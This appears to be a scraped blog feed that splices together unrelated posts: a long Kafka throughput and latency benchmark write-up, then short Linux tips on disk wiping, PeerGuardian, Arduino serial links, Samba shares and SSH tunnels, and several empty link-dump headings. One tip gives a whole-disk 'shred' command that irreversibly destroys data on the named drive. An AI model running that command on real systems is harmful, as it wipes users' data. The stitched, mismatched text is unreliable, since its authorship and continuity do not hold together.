One quick philosophical note on this benchmark. For benchmarks that are going to be publicly reported, I like to follow a style I call "lazy benchmarking". When you work on a system, you generally have the know-how to tune it to perfection for any particular use case. This leads to a kind of benchmarketing where you heavily tune your configuration to your benchmark or worse have a different tuning for each scenario you test. I think the real test of a system is not how it performs when perfectly tuned, but rather how it performs "off the shelf". This is particularly true for systems that run in a multi-tenant setup with dozens or hundreds of use cases where tuning for each use case would be not only impractical but impossible. As a result, I have pretty much stuck with default settings, both for the server and the clients. I will point out areas where I suspect the result could be improved with a little tuning, but I have tried to resist the temptation to do any fiddling myself to improve the results.

I have posted my exact configurations and commands, so it should be possible to replicate results on your own gear if you are interested.

The Setup

For these tests, I had six machines, each with the following specs:

  • Intel Xeon 2.5 GHz processor with six cores
  • Six 7200 RPM SATA drives
  • 32GB of RAM
  • 1Gb Ethernet

The Kafka cluster is set up on three of the machines. The six drives are directly mounted with no RAID (JBOD style). The remaining three machines I use for Zookeeper and for generating load.

A three machine cluster isn't very big, but since we will only be testing up to a replication factor of three, it is all we need. As should be obvious, we can always add more partitions and spread data onto more machines to scale our cluster horizontally.

This hardware is actually not LinkedIn's normal Kafka hardware. Our Kafka machines are more closely tuned to running Kafka, but are less in the spirit of "off-the-shelf" I was aiming for with these tests. Instead, I borrowed these from one of our Hadoop clusters, which runs on probably the cheapest gear of any of our persistent systems. Hadoop usage patterns are pretty similar to Kafka's, so this is a reasonable thing to do.

Okay, without further ado, the results!

Producer Throughput

These tests will stress the throughput of the producer. No consumers are run during these tests, so all messages are persisted but not read (we'll test cases with both producer and consumer in a bit). Since we have recently rewritten our producer, I am testing this new code.

Single producer thread, no replication

821,557 records/sec
(78.3 MB/sec)

For this first test I create a topic with six partitions and no replication. Then I produce 50 million small (100 byte) records as quickly as possible from a single thread.

The reason for focusing on small records in these tests is that it is the harder case for a messaging system (generally). It is easy to get good throughput in MB/sec if the messages are large, but much harder to get good throughput when the messages are small, as the overhead of processing each message dominates.

Throughout this benchmark, when I am reporting MB/sec, I am reporting just the value size of the record times the requests per second; none of the other overhead of the request is included. So the actual network usage is higher than what is reported. For example with a 100 byte message we would also transmit about 22 bytes of overhead per message (for an optional key, size delimiting, a message CRC, the record offset, and attributes flag), as well as some overhead for the request (including the topic, partition, required acknowledgements, etc). This makes it a little harder to see where we hit the limits of the NIC, but this seems a little more reasonable than including our own overhead bytes in throughput numbers. So, in the above result, we are likely saturating the 1 gigabit NIC on the client machine.
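The reported figure is just value size times records per second (with MB taken as 2^20 bytes); adding the roughly 22 bytes of per-message overhead from the text shows how much closer the wire traffic is to the NIC limit:

```python
records_per_sec = 821_557
value_size = 100                 # bytes of record value
overhead = 22                    # approx. per-message framing bytes

# Reported throughput counts only the value bytes.
reported = records_per_sec * value_size / 2**20
# Actual wire usage also carries the per-message overhead.
wire = records_per_sec * (value_size + overhead) / 2**20

print(round(reported, 1))  # 78.3, matching the figure above
```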

One immediate observation is that the raw numbers here are much higher than people expect, especially for a persistent storage system. If you are used to random-access data systems, like a database or key-value store, you will generally expect maximum throughput around 5,000 to 50,000 queries-per-second, as this is close to the speed that a good RPC layer can do remote requests. We exceed this due to two key design principles:

  1. We work hard to ensure we do linear disk I/O. The six cheap disks these servers have give an aggregate throughput of 822 MB/sec of linear disk I/O. This is actually well beyond what we can make use of with only a 1 gigabit network card. Many messaging systems treat persistence as an expensive add-on that decimates performance and should be used only sparingly, but this is because they are not able to do linear I/O.
  2. At each stage we work on batching together small bits of data into larger network and disk I/O operations. For example, in the new producer we use a "group commit"-like mechanism to ensure that any record sends initiated while another I/O is in progress get grouped together. For more on understanding the importance of batching, check out this presentation by David Patterson on why "Latency Lags Bandwidth".

If you are interested in the details you can read a little more about this in our design documents.

Single producer thread, 3x asynchronous replication

786,980 records/sec
(75.1 MB/sec)

This test is exactly the same as the previous one except that now each partition has three replicas (so the total data written to network or disk is three times higher). Each server is doing both writes from the producer for the partitions for which it is a master, as well as fetching and writing data for the partitions for which it is a follower.

Replication in this test is asynchronous. That is, the server acknowledges the write as soon as it has written it to its local log without waiting for the other replicas to also acknowledge it. This means, if the master were to crash, it would likely lose the last few messages that had been written but not yet replicated. This makes the message acknowledgement latency a little better at the cost of some risk in the case of server failure.

The key takeaway I would like people to have from this is that replication can be fast. The total cluster write capacity is, of course, 3x less with 3x replication (since each write is done three times), but the throughput is still quite good per client. High performance replication comes in large part from the efficiency of our consumer (the replicas are really nothing more than a specialized consumer) which I will discuss in the consumer section.

Single producer thread, 3x synchronous replication

421,823 records/sec
(40.2 MB/sec)

This test is the same as above except that now the master for a partition waits for acknowledgement from the full set of in-sync replicas before acknowledging back to the producer. In this mode, we guarantee that messages will not be lost as long as one in-sync replica remains.

Synchronous replication in Kafka is not fundamentally very different from asynchronous replication. The leader for a partition always tracks the progress of the follower replicas to monitor their liveness, and we never give out messages to consumers until they are fully acknowledged by replicas. With synchronous replication we just wait to respond to the producer request until the followers have replicated it.

This additional latency does seem to affect our throughput. Since the code path on the server is very similar, we could probably ameliorate this impact by tuning the batching to be a bit more aggressive and allowing the client to buffer more outstanding requests. However, in spirit of avoiding special case tuning, I have avoided this.

Three producers, 3x async replication

2,024,032 records/sec
(193.0 MB/sec)

Our single producer process is clearly not stressing our three node cluster. To add a little more load, I'll now repeat the previous async replication test, but now use three producer load generators running on three different machines (running more processes on the same machine won't help as we are saturating the NIC). Then we can look at the aggregate throughput across these three producers to get a better feel for the cluster's aggregate capacity.

Producer Throughput Versus Stored Data

One of the hidden dangers of many messaging systems is that they work well only as long as the data they retain fits in memory. Their throughput falls by an order of magnitude (or more) when data backs up and isn't consumed (and hence needs to be stored on disk). This means things may be running fine as long as your consumers keep up and the queue is empty, but as soon as they lag, the whole messaging layer backs up with unconsumed data. The backup causes data to go to disk, which in turn causes performance to drop to a rate at which the messaging system can no longer keep up with incoming data, and it either backs up or falls over. This is pretty terrible, as in many cases the whole purpose of the queue was to handle such a case gracefully.

Since Kafka always persists messages, its performance is O(1) with respect to unconsumed data volume.
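As a toy illustration of why an append-only log behaves this way (this is the access pattern, not Kafka's actual storage code):

```python
import os
import tempfile

# Appends always touch only the tail of the file, so the cost of writing
# record N does not depend on how many records are already stored.
path = os.path.join(tempfile.mkdtemp(), "log")
record = b"x" * 100
with open(path, "ab") as log:
    for _ in range(10_000):
        log.write(record)  # O(1) per append, regardless of file size
print(os.path.getsize(path))  # 1000000
```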

To test this experimentally, let's run our throughput test over an extended period of time and graph the results as the stored dataset grows:

This graph actually does show some variance in performance, but no impact due to data size: we perform just as well after writing a TB of data as we do for the first few hundred MBs.

The variance seems to be due to Linux's I/O management facilities that batch data and then flush it periodically. This is something we have tuned a little better in our production Kafka setup. Some notes on tuning I/O are available here.

Consumer Throughput

Okay now let's turn our attention to consumer throughput.

Note that the replication factor will not affect the outcome of this test, as the consumer only reads from one replica regardless of the replication factor. Likewise, the acknowledgement level of the producer doesn't matter, as the consumer only ever reads fully acknowledged messages (even if the producer doesn't wait for full acknowledgement). This ensures that any message the consumer sees will still be present after a leadership handoff (if the current leader fails).

Single Consumer

940,521 records/sec
(89.7 MB/sec)

For the first test, we will consume 50 million messages in a single thread from our 6 partition 3x replicated topic.

Kafka's consumer is very efficient. It works by fetching chunks of log directly from the filesystem. It uses the sendfile API to transfer this directly through the operating system without the overhead of copying the data through the application. This test actually starts at the beginning of the log, so it is doing real read I/O. In a production setting, though, the consumer reads almost exclusively out of the OS pagecache, since it is reading data that was just written by some producer (so it is still cached). In fact, if you run iostat on a production server you actually see that there are no physical reads at all, even though a great deal of data is being consumed.
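For reference, the same zero-copy primitive is exposed to userspace as sendfile(2); here is a minimal Linux sketch using Python's os.sendfile (an illustration of the mechanism, not Kafka's actual code path):

```python
import os
import tempfile

# Transfer bytes between two file descriptors inside the kernel with
# sendfile(2), avoiding a copy through application buffers.
# (File-to-file sendfile works on Linux; other platforms may require
# a socket as the destination.)
tmp = tempfile.mkdtemp()
src, dst = os.path.join(tmp, "src"), os.path.join(tmp, "dst")
with open(src, "wb") as f:
    f.write(b"log data " * 1000)  # 9000 bytes

in_fd = os.open(src, os.O_RDONLY)
out_fd = os.open(dst, os.O_WRONLY | os.O_CREAT)
sent = os.sendfile(out_fd, in_fd, 0, os.path.getsize(src))
os.close(in_fd)
os.close(out_fd)
print(sent)  # 9000
```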

Making consumers cheap is important for what we want Kafka to do. For one thing, the replicas are themselves consumers, so making the consumer cheap makes replication cheap. In addition, this makes handing out data an inexpensive operation, and hence not something we need to tightly control for scalability reasons.

Three Consumers

2,615,968 records/sec
(249.5 MB/sec)

Let's repeat the same test, but run three parallel consumer processes, each on a different machine, and all consuming the same topic.

As expected, we see near linear scaling (not surprising because consumption in our model is so simple).

Producer and Consumer

795,064 records/sec
(75.8 MB/sec)

The above tests covered just the producer and the consumer running in isolation. Now let's do the natural thing and run them together. Actually, we have technically already been doing this, since our replication works by having the servers themselves act as consumers.

All the same, let's run the test. For this test we'll run one producer and one consumer on a six partition 3x replicated topic that begins empty. The producer is again using async replication. The throughput reported is the consumer throughput (which is, obviously, an upper bound on the producer throughput).

As we would expect, the results we get are basically the same as we saw in the producer only case—the consumer is fairly cheap.

Effect of Message Size

I have mostly shown performance on small 100 byte messages. Smaller messages are the harder problem for a messaging system as they magnify the overhead of the bookkeeping the system does. We can show this by just graphing throughput in both records/second and MB/second as we vary the record size.

So, as we would expect, this graph shows that the raw count of records we can send per second decreases as the records get bigger. But if we look at MB/second, we see that the total byte throughput of real user data increases as messages get bigger:

We can see that with the 10-byte messages we are actually CPU bound by just acquiring the lock and enqueuing the message for sending—we are not able to actually max out the network. However, starting with 100 bytes, we are actually seeing network saturation (though the MB/sec continues to increase as our fixed-size bookkeeping bytes become an increasingly small percentage of the total bytes sent).
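The fixed-overhead effect can be sketched numerically. Note the per-record overhead below is an assumed illustrative value, not Kafka's actual record overhead:

```python
# Share of bytes on the wire that are real payload, given a fixed
# per-record bookkeeping overhead. The 30-byte overhead is an assumed
# value for illustration only, not Kafka's actual figure.
OVERHEAD = 30

def payload_fraction(record_size):
    return record_size / (record_size + OVERHEAD)

for size in (10, 100, 1000, 10_000):
    print(size, round(payload_fraction(size), 3))
# Larger records -> a larger share of the bytes sent is real user data.
```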

End-to-end Latency

2 ms (median)
3 ms (99th percentile)
14 ms (99.9th percentile)

We have talked a lot about throughput, but what is the latency of message delivery? That is, how long does it take a message we send to be delivered to the consumer? For this test, we will create a producer and a consumer and repeatedly time how long it takes for the producer to send a message to the Kafka cluster and for our consumer to receive it.

Note that Kafka only gives out messages to consumers once they are acknowledged by the full in-sync set of replicas. So this test will give the same results whether we use sync or async replication, as that setting only affects the acknowledgement to the producer.
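Percentiles like those quoted above can be computed from raw round-trip samples; a minimal nearest-rank sketch (the sample data here is made up):

```python
# Nearest-rank percentile over a list of latency samples (milliseconds).
def percentile(samples, p):
    s = sorted(samples)
    idx = min(len(s) - 1, int(p * len(s)))
    return s[idx]

samples = [1, 2, 2, 2, 3, 2, 2, 3, 2, 14]  # made-up round-trip times
print(percentile(samples, 0.50))   # 2  (median)
print(percentile(samples, 0.999))  # 14 (99.9th percentile)
```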

Replicating this test

If you want to try out these benchmarks on your own machines, you can. As I said, I mostly just used our pre-packaged performance testing tools that ship with Kafka and mostly stuck with the default configs both for the server and for the clients. However, you can see more details of the configuration and commands here.

Posted by SIMONE, 2016-05-26 13:53

          Quick Wipe of Hard Drive using Linux        
This is what I have found to be the quickest way to wipe a hard drive under Linux (you can use an Ubuntu Live CD to do this).

sudo shred -v -z -n 1 /dev/sda

(where 'sda' is whatever your drive is - sda, sdb, sdc etc)

The parameters used in the above example are: -

  • -v = verbose (show progress)
  • -z = add a final overwrite with zeros
  • -n 1 = Overwrite 1 time (instead of the default of 25)

This should overwrite any sensitive data on the disk once followed by zeros. Modern hard drives shouldn't need more than one pass overwrite anyway according to this article.

This method is by far the fastest that I have found - some of the other methods were estimated to take 3 days to complete on a 250GB hard drive; this way only took an hour or two.

          Installing Peerguardian Linux on Ubuntu 10.10        
Here are some quick notes on how to install pgl under Ubuntu 10.10.

1. Add the gpg key to the apt keyring

gpg --keyserver keyserver.ubuntu.com --recv 9C0042C8
gpg --export --armor 9C0042C8 | sudo apt-key add -

2. Add the repository sources to your /etc/apt/sources.list

vi /etc/apt/sources.list

deb http://ppa.launchpad.net/jre-phoenix/ppa/ubuntu maverick main
deb-src http://ppa.launchpad.net/jre-phoenix/ppa/ubuntu maverick main

3. Update packages & install pgl

sudo apt-get update
sudo apt-get install pgld pglcmd
(Answer the questions during installation process.)

4. To check status: -

sudo pglcmd status

          Checking video codec information via the command-line        
Here are a couple of commands to get the information about a video file in Linux (bitrate etc.): -

 ffmpeg -i foo.avi 
 mplayer -vo null -ao null -identify -frames 0 foo.avi 

          Connecting an Arduino to a Seagate Dockstar        
Here's a quick summary of how to connect your arduino to a Seagate Dockstar.

Checking connection

1. Install Plugbox Linux on the Dockstar (via http://plugapps.com/index.php5?title=PlugApps:Pogoplug_Setboot )

2. Plug in arduino to Dockstar via USB cable

3. Check arduino recognised

[root@Plugbox ~]# dmesg
The bottom lines should look something like: -

[ 126.200168] usb 1-1.3: new full speed USB device using orion-ehci and address 4
[ 126.382290] usbcore: registered new interface driver usbserial
[ 126.382974] USB Serial support registered for generic
[ 126.383709] usbcore: registered new interface driver usbserial_generic
[ 126.383722] usbserial: USB Serial Driver core
[ 126.401088] USB Serial support registered for FTDI USB Serial Device
[ 126.401283] ftdi_sio 1-1.3:1.0: FTDI USB Serial Device converter detected
[ 126.401569] usb 1-1.3: Detected FT232RL
[ 126.401582] usb 1-1.3: Number of endpoints 2
[ 126.401592] usb 1-1.3: Endpoint 1 MaxPacketSize 64
[ 126.401601] usb 1-1.3: Endpoint 2 MaxPacketSize 64
[ 126.401610] usb 1-1.3: Setting MaxPacketSize 64
[ 126.402330] usb 1-1.3: FTDI USB Serial Device converter now attached to ttyUSB0
[ 126.403067] usbcore: registered new interface driver ftdi_sio
[ 126.403080] ftdi_sio: v1.6.0:USB FTDI Serial Converters Driver

4. Check which device to use

[root@Plugbox ~]# ls -ltr /dev/ttyU*
crw-rw---- 1 root uucp 188, 0 Oct 29 13:17 /dev/ttyUSB0

Communication via Command Line

1. Configure serial port (taken from http://www.arduino.cc/playground/Interfacing/LinuxTTY)

[root@Plugbox ~]# stty -F /dev/ttyUSB0 cs8 19200 ignbrk -brkint -icrnl -imaxbel -opost -onlcr -isig -icanon -iexten -echo -echoe -echok -echoctl -echoke noflsh -ixon -crtscts
(19200 should match the baud rate set via Serial.begin(XXXX) in the arduino program)

2. Read data from arduino: -

[root@Plugbox ~]# cat /dev/ttyUSB0
3. Send data to arduino: -

[root@Plugbox ~]# echo "Hello Arduino" > /dev/ttyUSB0

Communication via Minicom

1. Install minicom

[root@Plugbox ~]# pacman -Sy minicom
2. Fire up minicom

[root@Plugbox ~]# minicom -D /dev/ttyUSB0 -b 19200
          Windows 7 and Samba Shares        
This is a quick guide to setting up Samba file sharing on my Viglen MPC-L server which is running Ubuntu 8.04.3 LTS. The client is a Windows 7 machine – no changes to the registry or local security policy were needed. The following applies to the version of Samba from the repositories - smbd version 3.0.28a.

1. Install Samba

sudo apt-get install samba smbfs

2. Edit Samba Configuration File

Find the line which is commented out - “;   security=user” and change it to: -
security = user

username map = /etc/samba/smbusers

Find the line “encrypt passwords = no” and change it to “encrypt passwords = true”

Add a section for each share that you want to be available; the name in square brackets (here [data]) becomes the share name: -

[data]

browseable = yes

comment = Data

path = /data

force user = viglen

force group = users

read only = No

guest ok = Yes

3. Add “smbusers” file

A new file is now needed to map smb users onto local linux users. Create the file: -
sudo vi /etc/samba/smbusers

and add the following to it: -
viglen = "viglen"

4. Change SMB Password for user

Set a password for the viglen smb user by running the following command: -
sudo smbpasswd viglen

5. Restart Samba

sudo /etc/init.d/samba restart

6. Test Connection from Windows

Open a Windows command prompt (Start -> cmd) and enter the following command (with the correct IP address and password): -
net use q: \\aaa.bbb.ccc.ddd\data password /user:viglen

You should get a message “The command completed successfully.”, and Q: should be accessible through Windows Explorer etc.

To remove the share, enter the following command: -
net use /d q:

          Install new HD in G5        
I'm new to Mac; I mostly use Linux. I got this nice G5 with everything including manuals and 2 OE disks. One has 10.4 and the other 9.2 I...
          Created Unassigned: Memory segment is unavailable [17737]        
I have the Cosmos user kit installed with Visual Studio 2010. I created my OS and created an ISO image for it. However, the following popped up:

ISOLINUX 4.05 2011-12-9 ETCD copyright (C) 1994-2011 H. Peter Anvin et al
Loading cosmos.bin... ok
Memory segment at 0x02000000 (len 0x0009ecf4) is unavailable.

when I typed mboot.c32, it showed settings
when I typed cosmos.bin, this appeared:
![Image](https://drive.google.com/drive/folders/0B5l998B7V_NmRnRJNFR2c3NkV00?usp=sharing/cosmos.bin run.png)

Please Help!
P.S. This may not have anything to do with you, but it is a cosmos problem. I used VirtualBox to run the ISO image.

          Ruby is Gentoo, Python is Ubuntu        

I used to be a Gentoo guy. For like 7 years I ran it and it was my world. It was more of a religion than a Linux distro. But perhaps that’s implied. Anyway, I eventually ended up back at Ubuntu. I also used to be a Python guy, but I eventually ended up on Ruby. I feel...


I do a weekly show called Unsupervised Learning, where I curate the most interesting stories in infosec, technology, and humans, and talk about why they matter. You can subscribe here.

          How to Connect to a Local Port on a Remote SSH Server        

If you ever have a web server (or other type of server) running on a remote Linux box, and you want to connect to it using your local system, here's how you do it.

ssh -i ./.ssh/key.pem -N -L 8081:localhost:8000 user@host

This reads as: Authenticate using a key. The port you're listening on on your local system is...


I do a weekly show called Unsupervised Learning, where I curate the most interesting stories in infosec, technology, and humans, and talk about why they matter. You can subscribe here.

          More Spring reading        

Hi folks, here's a nice, juicy reading list for that rainy Saturday afternoon. Well... it has stopped raining here but that should not stop you from reading!


Slightly more hard core Java

Java in the future

A little bit of non-Java


Systems, data stores and more

Time series

Some fun stuff

Until next time! Ashwin.

          Spring 2017 tech reading        
Hello and a belated happy new year to you! Here's another big list of articles I thought was worth sharing. As always thanks to the authors who wrote these articles and to the people who shared them on Twitter/HackerNews/etc.

Distributed systems (and even plain systems)


SQL lateral view

Docker and containers

Science and math


Java streams and reactive systems

Java Lambdas

Just Java

General and/or fun

Until next time!

          Fall 2016 tech reading        
It's almost the end of the year, so here's another big list to go through while you wait at the airport on your way to your vacation.


Streaming JSON and JAX-RS streaming

Java Strings

Data - Small and Big

Channels and Actors



Misc Science/Tech

Misc - Fun, Tidbits

Happy holidays!

          Summer 2016 tech reading        

Hi there! Summer is here and almost gone. So here's a gigantic list of my favorite, recent articles, which I should've shared sooner.


Other languages

Reactive programming

Persistent data structures



Systems and other computer science-y stuff


Until next time! Ashwin.

          Fall 2015 tech reading        
Big systems:
Until next time!
          Summer 2015 tech reading and goodies        
Graph and other stores:
  • http://www.slideshare.net/HBaseCon/use-cases-session-5
  • http://www.datastax.com/dev/blog/tales-from-the-tinkerpop
  • TAO: Facebook's Distributed Data Store for the Social Graph
    Architecture & Implementation
    All of the data for objects and associations is stored in MySQL. A non-SQL store could also have been used, but when looking at the bigger picture SQL still has many advantages:
    …it is important to consider the data accesses that don’t use the API. These include back-ups, bulk import and deletion of data, bulk migrations from one data format to another, replica creation, asynchronous replication, consistency monitoring tools, and operational debugging. An alternate store would also have to provide atomic write transactions, efficient granular writes, and few latency outliers
  • Twitter Heron: Stream Processing at Scale
    Storm has no backpressure mechanism. If the receiver component is unable to handle incoming data/tuples, then the sender simply drops tuples. This is a fail-fast mechanism, and a simple strategy, but it has the following disadvantages:
Second, as mentioned in [20], Storm uses Zookeeper extensively to manage heartbeats from the workers and the supervisors. This use of Zookeeper limits the number of workers per topology, and the total number of topologies in a cluster, as at very large numbers Zookeeper becomes the bottleneck.
Hence in Storm, each tuple has to pass through four threads from the point of entry to the point of exit inside the worker process. This design leads to significant overhead and queue contention issues.
    Furthermore, each worker can run disparate tasks. For example, a Kafka spout, a bolt that joins the incoming tuples with a Twitter internal service, and another bolt writing output to a key-value store might be running in the same JVM. In such scenarios, it is difficult to reason about the behavior and the performance of a particular task, since it is not possible to isolate its resource usage. As a result, the favored troubleshooting mechanism is to restart the topology. After restart, it is perfectly possible that the misbehaving task could be scheduled with some other task(s), thereby making it hard to track down the root cause of the original problem.
    Since logs from multiple tasks are written into a single file, it is hard to identify any errors or exceptions that are associated with a particular task. The situation gets worse quickly if some tasks log a larger amount of information compared to other tasks. Furthermore, an unhandled exception in a single task takes down the entire worker process, thereby killing other (perfectly fine) running tasks. Thus, errors in one part of the topology can indirectly impact the performance of other parts of the topology, leading to high variance in the overall performance. In addition, disparate tasks make garbage collection related-issues extremely hard to track down in practice.
For resource allocation purposes, Storm assumes that every worker is homogeneous. This architectural assumption results in inefficient utilization of allocated resources, and often results in over-provisioning. For example, consider scheduling 3 spouts and 1 bolt on 2 workers. Assuming that the bolt and the spout tasks each need 10GB and 5GB of memory respectively, this topology needs to reserve a total of 15GB memory per worker since one of the workers has to run a bolt and a spout task. This allocation policy leads to a total of 30GB of memory for the topology, while only 25GB of memory is actually required; thus, wasting 5GB of memory resource. This problem gets worse with an increasing number of diverse components being packed into a worker.
A tuple failure anywhere in the tuple tree leads to failure of the entire tuple tree. This effect is more pronounced with high fan-out topologies where the topology is not doing any useful work, but is simply replaying the tuples.
    The next option was to consider using another existing open- source solution, such as Apache Samza [2] or Spark Streaming [18]. However, there are a number of issues with respect to making these systems work in its current form at our scale. In addition, these systems are not compatible with Storm’s API. Rewriting the existing topologies with a different API would have been time consuming resulting in a very long migration process. Also note that there are different libraries that have been developed on top of the Storm API, such as Summingbird [8], and if we changed the underlying API of the streaming platform, we would have to change other components in our stack.
Until next time!

          A simple guide to using Unix/GNU Linux command line tools for fiddling with log files (*runs on Windows too)        
I've been meaning to write this post for years now. Every time I thought about compiling a basic list, I've told my self "Nah.. there must be tons of examples on the net". Yes there are tons of them but I couldn't find anything:
  • That helped absolute noobs with a consolidated list
  • That demonstrated actual fiddling with Java log files
  • Something that works on Windows(!) No, I don't mean the awful Cygwin tool but something like Busybox or the wonderful Gow
So, here it is:
          Starting 2015 with yet another link dump        
A belated happy new year! Here's some reading material I've been accumulating for a few months.

Distributed systems: